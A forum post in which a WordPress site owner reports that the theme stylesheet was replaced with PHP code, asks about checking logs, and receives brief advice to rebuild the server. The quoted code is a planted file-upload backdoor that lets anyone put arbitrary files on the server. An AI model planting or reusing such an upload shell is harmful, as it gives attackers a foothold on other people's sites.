WordPress Site Possibly Hacked

Posted July 8, 2014 4.9k views

Today I went to my site ( and noticed that my styles were gone. I found out that my theme’s stylesheet has been overwritten with this

    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

I am on an Ubuntu server with SSH and FTP access. Any suggestions? Can I view a log to see if there any weird IP’s logging in?

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

Submit an Answer
2 answers

If you have been compromised, shut down the server immediately and rebuild it from scratch.

That’s what I meant by the server, yes.